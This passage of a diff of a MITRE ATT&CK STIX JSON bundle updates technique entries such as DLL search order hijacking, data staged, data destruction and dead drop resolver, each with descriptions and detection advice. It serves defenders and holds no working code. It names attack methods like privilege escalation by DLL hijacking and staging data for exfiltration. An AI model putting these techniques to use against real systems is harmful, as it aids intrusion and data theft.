(Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. 
In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\nPrograms that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
- "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-26T16:13:58.862Z",
- "created": "2020-03-13T18:11:08.357Z",
"x_mitre_platforms": [
"Windows"
],
@@ -6076,22 +6315,22 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T16:23:21.010Z",
+ "modified": "2020-06-20T22:05:42.513Z",
"created": "2020-03-13T19:41:37.908Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
"x_mitre_data_sources": [
"Loaded DLLs",
"Process monitoring",
"Process use of network"
],
- "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -6133,11 +6372,12 @@
],
"modified": "2020-03-27T19:02:44.600Z",
"created": "2020-03-15T16:27:31.768Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_contributors": [
+ "Jan Petrov, Citi"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.",
"x_mitre_data_sources": [
"DNS records",
"Netflow/Enclave netflow",
@@ -6146,11 +6386,10 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Jan Petrov, Citi"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -6192,16 +6431,16 @@
],
"modified": "2020-03-27T20:54:28.287Z",
"created": "2020-03-11T14:56:34.154Z",
+ "x_mitre_data_sources": [
+ "DNS records"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.",
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "DNS records"
]
},
{
@@ -6278,28 +6517,28 @@
],
"modified": "2020-03-27T21:08:19.783Z",
"created": "2019-03-14T18:47:17.701Z",
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process command-line parameters",
- "Process monitoring"
- ],
- "x_mitre_version": "1.0",
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process command-line parameters",
+ "Process monitoring"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.",
+ "x_mitre_impact_type": [
+ "Availability"
+ ]
},
{
"id": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
@@ -6340,27 +6579,27 @@
],
"modified": "2020-03-14T23:39:50.338Z",
"created": "2017-05-31T21:31:43.540Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Itzik Kotler, SafeBreach"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_network_requirements": true,
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_network_requirements": true,
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_contributors": [
+ "Itzik Kotler, SafeBreach"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -6431,29 +6670,29 @@
],
"modified": "2020-03-27T21:09:28.699Z",
"created": "2019-03-15T13:59:30.390Z",
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "root",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_impact_type": [
+ "Availability"
],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.",
"x_mitre_data_sources": [
"Kernel drivers",
"File monitoring",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.",
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "root",
+ "SYSTEM"
+ ],
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -6479,29 +6718,29 @@
],
"modified": "2020-03-28T23:16:20.202Z",
"created": "2020-03-02T14:19:22.609Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Packet capture",
- "Network protocol analysis",
- "File monitoring",
- "Application logs"
- ],
- "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Network protocol analysis",
+ "File monitoring",
+ "Application logs"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842",
@@ -6532,27 +6771,27 @@
],
"modified": "2020-03-15T00:40:27.670Z",
"created": "2017-05-31T21:30:18.931Z",
- "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Data Staged",
- "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
+ "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -6563,6 +6802,11 @@
"source_name": "PWC Cloud Hopper April 2017",
"description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.",
"url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
}
],
"object_marking_refs": [
@@ -6575,15 +6819,13 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T17:26:16.286Z",
+ "modified": "2020-06-24T18:59:16.039Z",
"created": "2017-05-31T21:30:58.938Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian",
+ "Shane Tully, @securitygypsy"
],
- "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -6592,11 +6834,13 @@
"GCP",
"Azure"
],
- "x_mitre_contributors": [
- "Praetorian",
- "Shane Tully, @securitygypsy"
+ "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd",
@@ -6625,22 +6869,23 @@
"phase_name": "exfiltration"
}
],
- "modified": "2019-06-24T12:03:02.387Z",
+ "modified": "2020-07-14T19:47:46.912Z",
"created": "2017-05-31T21:30:34.523Z",
- "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Netflow/Enclave netflow",
"Process use of network",
"Process monitoring"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
@@ -6694,26 +6939,27 @@
"phase_name": "collection"
}
],
- "modified": "2019-10-22T20:02:00.249Z",
+ "modified": "2020-07-09T14:02:05.276Z",
"created": "2019-08-30T18:07:27.741Z",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Netskope",
+ "Praetorian"
+ ],
+ "x_mitre_detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.",
"x_mitre_data_sources": [
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.",
- "x_mitre_contributors": [
- "Netskope",
- "Praetorian"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure"
+ "x_mitre_permissions_required": [
+ "User"
]
},
{
@@ -6737,7 +6983,7 @@
"source_name": "Atlassian Confluence Logging"
}
],
- "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nAdversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001).",
+ "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nAdversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.",
"name": "Data from Information Repositories",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416",
@@ -6748,22 +6994,14 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T16:42:09.364Z",
+ "modified": "2020-06-30T22:50:06.087Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS",
- "SaaS",
- "AWS",
- "GCP",
- "Azure",
- "Office 365"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.1",
+ "x_mitre_contributors": [
+ "Praetorian",
+ "Milos Stojadinovic"
],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
"x_mitre_data_sources": [
"Azure activity logs",
"AWS CloudTrail logs",
@@ -6774,18 +7012,34 @@
"Data loss prevention",
"Third-party application logs"
],
- "x_mitre_contributors": [
- "Praetorian",
- "Milos Stojadinovic"
+ "x_mitre_detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_version": "2.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "SaaS",
+ "AWS",
+ "GCP",
+ "Azure",
+ "Office 365"
+ ]
},
{
- "id": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Data from Local System",
- "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+ "created": "2017-05-31T21:30:20.537Z",
+ "modified": "2020-05-26T19:21:25.974Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -6793,21 +7047,10 @@
"external_id": "T1005"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-24T15:40:46.979Z",
- "created": "2017-05-31T21:30:20.537Z",
- "x_mitre_contributors": [
- "Praetorian"
- ],
+ "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+ "name": "Data from Local System",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"x_mitre_version": "1.2",
"x_mitre_data_sources": [
"File monitoring",
@@ -6821,10 +7064,7 @@
"x_mitre_platforms": [
"Linux",
"macOS",
- "Windows",
- "GCP",
- "AWS",
- "Azure"
+ "Windows"
],
"x_mitre_is_subtechnique": false
},
@@ -6857,22 +7097,22 @@
],
"modified": "2020-03-24T15:42:44.026Z",
"created": "2017-05-31T21:30:41.022Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_system_requirements": [
- "Privileges to access network shared drive"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_system_requirements": [
+ "Privileges to access network shared drive"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
@@ -6898,24 +7138,40 @@
],
"modified": "2020-03-24T15:44:46.584Z",
"created": "2017-05-31T21:30:31.584Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_system_requirements": [
- "Privileges to access removable media drive and files"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_system_requirements": [
+ "Privileges to access removable media drive and files"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.1"
},
{
+ "created": "2020-03-14T22:24:21.841Z",
+ "modified": "2020-03-26T23:12:30.499Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
+ "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
+ "name": "Dead Drop Resolver",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -6928,22 +7184,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dead Drop Resolver",
- "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
- "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-26T23:12:30.499Z",
